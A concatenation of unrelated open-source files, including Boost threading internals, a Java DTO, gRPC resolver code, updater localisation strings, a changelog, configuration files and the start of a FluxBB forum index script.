            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        BOOST_THREAD_INVOKE_RET_VOID(f,p1, p2) BOOST_THREAD_INVOKE_RET_VOID_CALL;
                    }
                    BOOST_CATCH (...)
                    {
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }

    // Three-argument overload; same protocol.
    template<typename Function, typename T1, typename T2, typename T3>
    inline void call_once(once_flag& flag, Function f, T1 p1, T2 p2, T3 p3)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        BOOST_THREAD_INVOKE_RET_VOID(f,p1, p2, p3) BOOST_THREAD_INVOKE_RET_VOID_CALL;
                    }
                    BOOST_CATCH (...)
                    {
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }
    /* Move-emulation (BOOST_THREAD_RV_REF) call_once overloads; callable
       and arguments are decay-copied before invocation.  Same epoch
       protocol as documented on the variadic overload. */
    template<typename Function>
    inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        f();
                    }
                    BOOST_CATCH (...)
                    {
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }

    // Rvalue-ref overload with one forwarded argument; same protocol.
    template<typename Function, typename T1>
    inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(T1) p1)
    {
        static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
        static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
        thread_detail::uintmax_atomic_t const epoch=flag.epoch;
        thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();

        if(epoch<this_thread_epoch)
        {
            pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);

            while(flag.epoch<=being_initialized)
            {
                if(flag.epoch==uninitialized_flag)
                {
                    flag.epoch=being_initialized;
                    BOOST_TRY
                    {
                        pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
                        BOOST_THREAD_INVOKE_RET_VOID(
                            thread_detail::decay_copy(boost::forward<Function>(f)),
                            thread_detail::decay_copy(boost::forward<T1>(p1))
                        ) BOOST_THREAD_INVOKE_RET_VOID_CALL;
                    }
                    BOOST_CATCH (...)
                    {
                        flag.epoch=uninitialized_flag;
                        BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                        BOOST_RETHROW
                    }
                    BOOST_CATCH_END
                    flag.epoch=--thread_detail::once_global_epoch;
                    BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
                }
                else
                {
                    while(flag.epoch==being_initialized)
                    {
                        BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
                    }
                }
            }
            this_thread_epoch=thread_detail::once_global_epoch;
        }
    }
template<typename Function, typename T1, typename T2>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(T1) p1, BOOST_THREAD_RV_REF(T2) p2)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(
thread_detail::decay_copy(boost::forward<Function>(f)),
thread_detail::decay_copy(boost::forward<T1>(p1)),
thread_detail::decay_copy(boost::forward<T1>(p2))
) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
template<typename Function, typename T1, typename T2, typename T3>
inline void call_once(once_flag& flag, BOOST_THREAD_RV_REF(Function) f, BOOST_THREAD_RV_REF(T1) p1, BOOST_THREAD_RV_REF(T2) p2, BOOST_THREAD_RV_REF(T3) p3)
{
static thread_detail::uintmax_atomic_t const uninitialized_flag=BOOST_ONCE_INITIAL_FLAG_VALUE;
static thread_detail::uintmax_atomic_t const being_initialized=uninitialized_flag+1;
thread_detail::uintmax_atomic_t const epoch=flag.epoch;
thread_detail::uintmax_atomic_t& this_thread_epoch=thread_detail::get_once_per_thread_epoch();
if(epoch<this_thread_epoch)
{
pthread::pthread_mutex_scoped_lock lk(&thread_detail::once_epoch_mutex);
while(flag.epoch<=being_initialized)
{
if(flag.epoch==uninitialized_flag)
{
flag.epoch=being_initialized;
BOOST_TRY
{
pthread::pthread_mutex_scoped_unlock relocker(&thread_detail::once_epoch_mutex);
BOOST_THREAD_INVOKE_RET_VOID(
thread_detail::decay_copy(boost::forward<Function>(f)),
thread_detail::decay_copy(boost::forward<T1>(p1)),
thread_detail::decay_copy(boost::forward<T1>(p2)),
thread_detail::decay_copy(boost::forward<T1>(p3))
) BOOST_THREAD_INVOKE_RET_VOID_CALL;
}
BOOST_CATCH (...)
{
flag.epoch=uninitialized_flag;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
BOOST_RETHROW
}
BOOST_CATCH_END
flag.epoch=--thread_detail::once_global_epoch;
BOOST_VERIFY(!posix::pthread_cond_broadcast(&thread_detail::once_epoch_cv));
}
else
{
while(flag.epoch==being_initialized)
{
BOOST_VERIFY(!posix::pthread_cond_wait(&thread_detail::once_epoch_cv,&thread_detail::once_epoch_mutex));
}
}
}
this_thread_epoch=thread_detail::once_global_epoch;
}
}
#endif
}
#include <boost/config/abi_suffix.hpp>
#endif
| {
"pile_set_name": "Github"
} |
/*
* #%L
* de.metas.business.rest-api
* %%
* Copyright (C) 2020 metas GmbH
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program. If not, see
* <http://www.gnu.org/licenses/gpl-2.0.html>.
* #L%
*/
package de.metas.rest_api.process.response;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.databind.annotation.JsonDeserialize;
import lombok.Builder;
import lombok.Value;
/**
 * JSON representation of a single process parameter's basic info
 * (name, column name, type and description), exposed by the process
 * response API in this package.
 * <p>
 * Immutable (lombok {@code @Value}); instances are deserialized through the
 * lombok-generated builder ({@code @JsonDeserialize}). Unknown JSON
 * properties are ignored for forward compatibility.
 */
@Value
@Builder
@JsonIgnoreProperties(ignoreUnknown = true)
@JsonDeserialize(builder = JSONProcessParamBasicInfo.JSONProcessParamBasicInfoBuilder.class)
public class JSONProcessParamBasicInfo
{
	/** Display name of the parameter. */
	@JsonProperty("name")
	String name;
	/** Column name identifying the parameter. */
	@JsonProperty("columnName")
	String columnName;
	/** Type of the parameter, serialized as a plain string. */
	@JsonProperty("type")
	String type;
	/** Description of the parameter. */
	@JsonProperty("description")
	String description;
}
| {
"pile_set_name": "Github"
} |
(japanese-holidays :repo "emacs-jp/japanese-holidays"
:fetcher github)
| {
"pile_set_name": "Github"
} |
"%1$@ %2$@ has been downloaded and is ready to use! This is an important update; would you like to install it and relaunch %1$@ now?" = "%1$@ %2$@ er lastet ned og er klar til bruk! Dette er en viktig oppdatering; ønsker du å installere og restarte %1$@ nå?";
"%1$@ %2$@ has been downloaded and is ready to use! Would you like to install it and relaunch %1$@ now?" = "%1$@ %2$@ er lastet ned og er klar til bruk! Ønsker du å installere og restarte %1$@ nå?";
"%1$@ can't be updated when it's running from a read-only volume like a disk image or an optical drive. Move %1$@ to your Applications folder, relaunch it from there, and try again." = "%1$@ kan ikke oppdateres fra en 'bare lesbar' enhet som f.eks. en cd. Flytt %1$@ til Programmer-katalogen, start på ny og prøv igjen.";
"%@ %@ is currently the newest version available." = "%1$@ %2$@ er nyeste versjon.";
"%@ %@ is now available--you have %@. Would you like to download it now?" = "%1$@ %2$@ er nå tilgjengelig—du har %3$@. Ønsker du å laste ned og installere nå?";
"%@ downloaded" = "%@ lastet ned";
"%@ of %@" = "%1$@ av %2$@";
"A new version of %@ is available!" = "En ny versjon av %@ er tilgjengelig!";
"A new version of %@ is ready to install!" = "En ny versjon av %@ er klar for installering!";
"An error occurred in retrieving update information. Please try again later." = "En feil oppstod ved henting av oppdateringsinformasjon. Vennligst prøv igjen senere.";
"An error occurred while downloading the update. Please try again later." = "En feil oppstod under nedlasting av oppdateringen. Vennligst prøv igjen senere.";
"An error occurred while extracting the archive. Please try again later." = "En feil oppstod under utpakking av oppdateringen. Vennligst prøv igjen senere.";
"An error occurred while installing the update. Please try again later." = "En feil oppstod under installering av oppdateringen. Vennligst prøv igjen senere.";
"An error occurred while parsing the update feed." = "En feil oppstod under lesing av oppdateringsstrømmen.";
"An error occurred while relaunching %1$@, but the new version will be available next time you run %1$@." = "En feil oppstod under omstart av %1$@, men den nyeste versjonen vil være tilgjengelig neste gang du starter %1$@.";
"An important update to %@ is ready to install" = "En viktig oppdatering for %@ er klar til å installeres";
/* the unit for bytes */
"B" = "B";
"Cancel" = "Avbryt";
"Cancel Update" = "Avbryt oppdateringen";
"Checking for updates..." = "Søker etter oppdateringer…";
/* Take care not to overflow the status window. */
"Downloading update..." = "Laster ned oppdateringen…";
/* Take care not to overflow the status window. */
"Extracting update..." = "Pakker ut oppdateringen…";
/* the unit for gigabytes */
"GB" = "GB";
"Install and Relaunch" = "Installer og start på ny";
/* Take care not to overflow the status window. */
"Installing update..." = "Installerer oppdateringen…";
/* the unit for kilobytes */
"KB" = "KB";
/* the unit for megabytes */
"MB" = "MB";
/* OK button. */
"OK" = "OK";
/* Status message on progress window once download has finished. */
"Ready to Install" = "Klar til å installere";
/* Message that is optionally shown at startup to allow users to turn on/off update checks. */
"Should %1$@ automatically check for updates? You can always check for updates manually from the %1$@ menu." = "Skal %1$@ søke automatisk etter oppdateringer? Du kan når som helst søke manuelt fra %1$@-menyen.";
"Update Error!" = "Feil ved oppdateringen!";
"Updating %@" = "Oppdaterer %@";
/* 'Error' message when the user checks for updates but is already current or the feed doesn't contain any updates. (not necessarily shown in UI) */
"You already have the newest version of %@." = "Du har allerede nyeste versjon av %@.";
/* Status message shown when the user checks for updates but is already current or the feed doesn't contain any updates. */
"You're up-to-date!" = "Ingen nye oppdateringer";
/* Alternative name for "Install" button if we have a paid update or other update
without a download but with a URL. */
"Learn More..." = "Mer info…";
| {
"pile_set_name": "Github"
} |
// @flow
/* eslint-env mocha */
/* global suite, benchmark */
import getQuarter from '.'
import moment from 'moment'
// Benchmark suite comparing date-fns getQuarter with Moment.js quarter().
// NOTE: plain `function` expressions are required here — the benchmark
// framework binds `this` to the suite context that `setup` populates,
// so arrow functions would break the fixtures.
suite('getQuarter', function () {
  benchmark('date-fns', function () {
    // `this.date` is created once in `setup` below and shared by all runs.
    return getQuarter(this.date)
  })
  benchmark('Moment.js', function () {
    return this.moment.quarter()
  })
}, {
  setup: function () {
    // Fixtures shared by both benchmarks, built outside the timed region.
    this.date = new Date()
    this.moment = moment()
  }
})
| {
"pile_set_name": "Github"
} |
################### DataSource Configuration ##########################
jdbc.driverClassName=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://localhost:3306/test
jdbc.username=root
jdbc.password=admin
validationQuery=SELECT 1
################### Hibernate Configuration ##########################
hibernate.dialect=org.hibernate.dialect.MySQLDialect
hibernate.show_sql=true
hibernate.hbm2ddl.auto=update
hibernate.generate_statistics=true
initialize_database=false | {
"pile_set_name": "Github"
} |
0.6.1 / 2012-06-01
==================
* Added: append (yes or no) on confirmation
* Added: allow node.js v0.7.x
0.6.0 / 2012-04-10
==================
* Added `.prompt(obj, callback)` support. Closes #49
* Added default support to .choose(). Closes #41
* Fixed the choice example
0.5.1 / 2011-12-20
==================
* Fixed `password()` for recent nodes. Closes #36
0.5.0 / 2011-12-04
==================
* Added sub-command option support [itay]
0.4.3 / 2011-12-04
==================
* Fixed custom help ordering. Closes #32
0.4.2 / 2011-11-24
==================
* Added travis support
* Fixed: line-buffered input automatically trimmed. Closes #31
0.4.1 / 2011-11-18
==================
* Removed listening for "close" on --help
0.4.0 / 2011-11-15
==================
* Added support for `--`. Closes #24
0.3.3 / 2011-11-14
==================
* Fixed: wait for close event when writing help info [Jerry Hamlet]
0.3.2 / 2011-11-01
==================
* Fixed long flag definitions with values [felixge]
0.3.1 / 2011-10-31
==================
* Changed `--version` short flag to `-V` from `-v`
* Changed `.version()` so it's configurable [felixge]
0.3.0 / 2011-10-31
==================
* Added support for long flags only. Closes #18
0.2.1 / 2011-10-24
==================
* "node": ">= 0.4.x < 0.7.0". Closes #20
0.2.0 / 2011-09-26
==================
  * Allow for defaults that are not just boolean. Default assignment only occurs for --no-*, optional, and required arguments. [Jim Isaacs]
0.1.0 / 2011-08-24
==================
* Added support for custom `--help` output
0.0.5 / 2011-08-18
==================
* Changed: when the user enters nothing prompt for password again
* Fixed issue with passwords beginning with numbers [NuckChorris]
0.0.4 / 2011-08-15
==================
* Fixed `Commander#args`
0.0.3 / 2011-08-15
==================
* Added default option value support
0.0.2 / 2011-08-15
==================
* Added mask support to `Command#password(str[, mask], fn)`
* Added `Command#password(str, fn)`
0.0.1 / 2010-01-03
==================
* Initial release
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2013-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.cloudfoundry.routing.v1;
import org.cloudfoundry.AbstractIntegrationTest;
import org.cloudfoundry.routing.RoutingClient;
import org.cloudfoundry.routing.v1.routergroups.ListRouterGroupsRequest;
import org.cloudfoundry.routing.v1.routergroups.ListRouterGroupsResponse;
import org.cloudfoundry.routing.v1.routergroups.RouterGroup;
import org.cloudfoundry.routing.v1.routergroups.UpdateRouterGroupRequest;
import org.cloudfoundry.routing.v1.routergroups.UpdateRouterGroupResponse;
import org.junit.Test;
import org.springframework.beans.factory.annotation.Autowired;
import reactor.core.publisher.Mono;
import reactor.test.StepVerifier;
import java.time.Duration;
import java.util.concurrent.TimeoutException;
/**
 * Integration tests for the Routing API v1 router-groups endpoints:
 * listing router groups and updating a group's reservable ports.
 */
public final class RouterGroupsTest extends AbstractIntegrationTest {
    // Name of the router group expected to exist in the environment under test.
    private static final String DEFAULT_ROUTER_GROUP = "default-tcp";
    @Autowired
    private RoutingClient routingClient;
    // Lists all router groups and verifies the default TCP group is present.
    @Test
    public void list() {
        this.routingClient.routerGroups()
            .list(ListRouterGroupsRequest.builder()
                .build())
            .flatMapIterable(ListRouterGroupsResponse::getRouterGroups)
            .map(RouterGroup::getName)
            .filter(DEFAULT_ROUTER_GROUP::equals)
            .as(StepVerifier::create)
            .expectNext(DEFAULT_ROUTER_GROUP)
            .expectComplete()
            .verify(Duration.ofMinutes(5));
    }
    // Updates the default group's reservable ports and checks the new range
    // is echoed back in the response.
    @Test
    public void update() {
        getRouterGroupId(this.routingClient, DEFAULT_ROUTER_GROUP)
            .flatMap(routerGroupId -> this.routingClient.routerGroups()
                .update(UpdateRouterGroupRequest.builder()
                    .reservablePorts("61001-61099")
                    .routerGroupId(routerGroupId)
                    .build()))
            .map(UpdateRouterGroupResponse::getReservablePorts)
            .as(StepVerifier::create)
            .expectNext("61001-61099")
            .expectComplete()
            .verify(Duration.ofMinutes(5));
    }
    // Resolves the ID of the router group with the given name; .single()
    // errors the Mono if zero or multiple groups match.
    private static Mono<String> getRouterGroupId(RoutingClient routingClient, String routerGroupName) {
        return requestListRouterGroups(routingClient)
            .flatMapIterable(ListRouterGroupsResponse::getRouterGroups)
            .filter(group -> routerGroupName.equals(group.getName()))
            .single()
            .map(RouterGroup::getRouterGroupId);
    }
    // Issues a bare list request for all router groups.
    private static Mono<ListRouterGroupsResponse> requestListRouterGroups(RoutingClient routingClient) {
        return routingClient.routerGroups()
            .list(ListRouterGroupsRequest.builder()
                .build());
    }
}
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2017 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
// Package resolver defines APIs for name resolution in gRPC.
// All APIs in this package are experimental.
package resolver
import (
"google.golang.org/grpc/serviceconfig"
)
var (
// m is a map from scheme to resolver builder.
m = make(map[string]Builder)
// defaultScheme is the default scheme to use.
defaultScheme = "passthrough"
)
// TODO(bar) install dns resolver in init(){}.
// Register registers the resolver builder to the resolver map. b.Scheme will be
// used as the scheme registered with this builder.
//
// NOTE: this function must only be called during initialization time (i.e. in
// an init() function), and is not thread-safe. If multiple Resolvers are
// registered with the same name, the one registered last will take effect.
func Register(b Builder) {
m[b.Scheme()] = b
}
// Get returns the resolver builder registered with the given scheme.
//
// If no builder is register with the scheme, nil will be returned.
func Get(scheme string) Builder {
	// Indexing a map with a missing key yields the element type's zero
	// value, which for the Builder interface is nil — exactly the
	// documented "no builder registered" result.
	return m[scheme]
}
// SetDefaultScheme sets the default scheme that will be used. The default
// default scheme is "passthrough".
//
// NOTE: this function must only be called during initialization time (i.e. in
// an init() function), and is not thread-safe. The scheme set last overrides
// previously set values.
func SetDefaultScheme(scheme string) {
defaultScheme = scheme
}
// GetDefaultScheme gets the default scheme that will be used.
func GetDefaultScheme() string {
return defaultScheme
}
// AddressType indicates the address type returned by name resolution.
type AddressType uint8
const (
// Backend indicates the address is for a backend server.
Backend AddressType = iota
// GRPCLB indicates the address is for a grpclb load balancer.
GRPCLB
)
// Address represents a server the client connects to.
// This is the EXPERIMENTAL API and may be changed or extended in the future.
type Address struct {
// Addr is the server address on which a connection will be established.
Addr string
// Type is the type of this address.
Type AddressType
// ServerName is the name of this address.
//
// e.g. if Type is GRPCLB, ServerName should be the name of the remote load
// balancer, not the name of the backend.
ServerName string
// Metadata is the information associated with Addr, which may be used
// to make load balancing decision.
Metadata interface{}
}
// BuildOption includes additional information for the builder to create
// the resolver.
type BuildOption struct {
// DisableServiceConfig indicates whether resolver should fetch service config data.
DisableServiceConfig bool
}
// State contains the current Resolver state relevant to the ClientConn.
type State struct {
Addresses []Address // Resolved addresses for the target
// ServiceConfig is the parsed service config; obtained from
// serviceconfig.Parse.
ServiceConfig serviceconfig.Config
// TODO: add Err error
}
// ClientConn contains the callbacks for resolver to notify any updates
// to the gRPC ClientConn.
//
// This interface is to be implemented by gRPC. Users should not need a
// brand new implementation of this interface. For the situations like
// testing, the new implementation should embed this interface. This allows
// gRPC to add new methods to this interface.
type ClientConn interface {
// UpdateState updates the state of the ClientConn appropriately.
UpdateState(State)
// NewAddress is called by resolver to notify ClientConn a new list
// of resolved addresses.
// The address list should be the complete list of resolved addresses.
//
// Deprecated: Use UpdateState instead.
NewAddress(addresses []Address)
// NewServiceConfig is called by resolver to notify ClientConn a new
// service config. The service config should be provided as a json string.
//
// Deprecated: Use UpdateState instead.
NewServiceConfig(serviceConfig string)
}
// Target represents a target for gRPC, as specified in:
// https://github.com/grpc/grpc/blob/master/doc/naming.md.
// It is parsed from the target string that gets passed into Dial or DialContext by the user. And
// grpc passes it to the resolver and the balancer.
//
// If the target follows the naming spec, and the parsed scheme is registered with grpc, we will
// parse the target string according to the spec. e.g. "dns://some_authority/foo.bar" will be parsed
// into &Target{Scheme: "dns", Authority: "some_authority", Endpoint: "foo.bar"}
//
// If the target does not contain a scheme, we will apply the default scheme, and set the Target to
// be the full target string. e.g. "foo.bar" will be parsed into
// &Target{Scheme: resolver.GetDefaultScheme(), Endpoint: "foo.bar"}.
//
// If the parsed scheme is not registered (i.e. no corresponding resolver available to resolve the
// endpoint), we set the Scheme to be the default scheme, and set the Endpoint to be the full target
// string. e.g. target string "unknown_scheme://authority/endpoint" will be parsed into
// &Target{Scheme: resolver.GetDefaultScheme(), Endpoint: "unknown_scheme://authority/endpoint"}.
type Target struct {
Scheme string
Authority string
Endpoint string
}
// Builder creates a resolver that will be used to watch name resolution updates.
type Builder interface {
// Build creates a new resolver for the given target.
//
// gRPC dial calls Build synchronously, and fails if the returned error is
// not nil.
Build(target Target, cc ClientConn, opts BuildOption) (Resolver, error)
// Scheme returns the scheme supported by this resolver.
// Scheme is defined at https://github.com/grpc/grpc/blob/master/doc/naming.md.
Scheme() string
}
// ResolveNowOption includes additional information for ResolveNow.
type ResolveNowOption struct{}
// Resolver watches for the updates on the specified target.
// Updates include address updates and service config updates.
type Resolver interface {
// ResolveNow will be called by gRPC to try to resolve the target name
// again. It's just a hint, resolver can ignore this if it's not necessary.
//
// It could be called multiple times concurrently.
ResolveNow(ResolveNowOption)
// Close closes the resolver.
Close()
}
// UnregisterForTesting removes the resolver builder with the given scheme from the
// resolver map.
// This function is for testing only.
func UnregisterForTesting(scheme string) {
delete(m, scheme)
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?><module codename="com.sun.tools.visualvm.coredump/0">
<module_version install_time="1410360604235" last="true" origin="installer" specification_version="1.0">
<file crc="245075297" name="config/Modules/com-sun-tools-visualvm-coredump.xml"/>
<file crc="3679815556" name="modules/com-sun-tools-visualvm-coredump.jar"/>
</module_version>
</module>
| {
"pile_set_name": "Github"
} |
<?php
/**
* Copyright (C) 2008-2012 FluxBB
* based on code by Rickard Andersson copyright (C) 2002-2008 PunBB
* License: http://www.gnu.org/licenses/gpl.html GPL version 2 or higher
*/
// Resolve the forum root and pull in the shared bootstrap (config, DB, session/user).
define('PUN_ROOT', dirname(__FILE__).'/');
require PUN_ROOT.'include/common.php';
// Groups without board-read permission get a 403 instead of the index page.
if ($pun_user['g_read_board'] == '0')
	message($lang_common['No view'], false, '403 Forbidden');
// Load the index.php language file
require PUN_ROOT.'lang/'.$pun_user['language'].'/index.php';
// Get list of forums and topics with new posts since last visit
if (!$pun_user['is_guest'])
{
	// Every readable forum whose last post is newer than the user's last visit.
	$result = $db->query('SELECT f.id, f.last_post FROM '.$db->prefix.'forums AS f LEFT JOIN '.$db->prefix.'forum_perms AS fp ON (fp.forum_id=f.id AND fp.group_id='.$pun_user['g_id'].') WHERE (fp.read_forum IS NULL OR fp.read_forum=1) AND f.last_post>'.$pun_user['last_visit']) or error('Unable to fetch forum list', __FILE__, __LINE__, $db->error());
	if ($db->has_rows($result))
	{
		$forums = $new_topics = array();
		$tracked_topics = get_tracked_topics();
		while ($cur_forum = $db->fetch_assoc($result))
		{
			// Keep only forums the user has not already marked read past this post.
			if (!isset($tracked_topics['forums'][$cur_forum['id']]) || $tracked_topics['forums'][$cur_forum['id']] < $cur_forum['last_post'])
				$forums[$cur_forum['id']] = $cur_forum['last_post'];
		}
		if (!empty($forums))
		{
			// Without per-topic tracking data, every candidate forum counts as "new".
			if (empty($tracked_topics['topics']))
				$new_topics = $forums;
			else
			{
				// Otherwise inspect individual topics to confirm genuinely unread posts.
				$result = $db->query('SELECT forum_id, id, last_post FROM '.$db->prefix.'topics WHERE forum_id IN('.implode(',', array_keys($forums)).') AND last_post>'.$pun_user['last_visit'].' AND moved_to IS NULL') or error('Unable to fetch new topics', __FILE__, __LINE__, $db->error());
				while ($cur_topic = $db->fetch_assoc($result))
				{
					// A forum is flagged once any topic in it is newer than both the
					// forum-level and topic-level read marks.
					if (!isset($new_topics[$cur_topic['forum_id']]) && (!isset($tracked_topics['forums'][$cur_topic['forum_id']]) || $tracked_topics['forums'][$cur_topic['forum_id']] < $forums[$cur_topic['forum_id']]) && (!isset($tracked_topics['topics'][$cur_topic['id']]) || $tracked_topics['topics'][$cur_topic['id']] < $cur_topic['last_post']))
						$new_topics[$cur_topic['forum_id']] = $forums[$cur_topic['forum_id']];
				}
			}
		}
	}
}
if ($pun_config['o_feed_type'] == '1')
$page_head = array('feed' => '<link rel="alternate" type="application/rss+xml" href="extern.php?action=feed&type=rss" title="'.$lang_common['RSS active topics feed'].'" />');
else if ($pun_config['o_feed_type'] == '2')
$page_head = array('feed' => '<link rel="alternate" type="application/atom+xml" href="extern.php?action=feed&type=atom" title="'.$lang_common['Atom active topics feed'].'" />');
$forum_actions = array();
// Display a "mark all as read" link
if (!$pun_user['is_guest'])
$forum_actions[] = '<a href="misc.php?action=markread&csrf_token='.pun_csrf_token().'">'.$lang_common['Mark all as read'].'</a>';
$page_title = array(pun_htmlspecialchars($pun_config['o_board_title']));
define('PUN_ALLOW_INDEX', 1);
define('PUN_ACTIVE_PAGE', 'index');
require PUN_ROOT.'header.php';
// Print the categories and forums
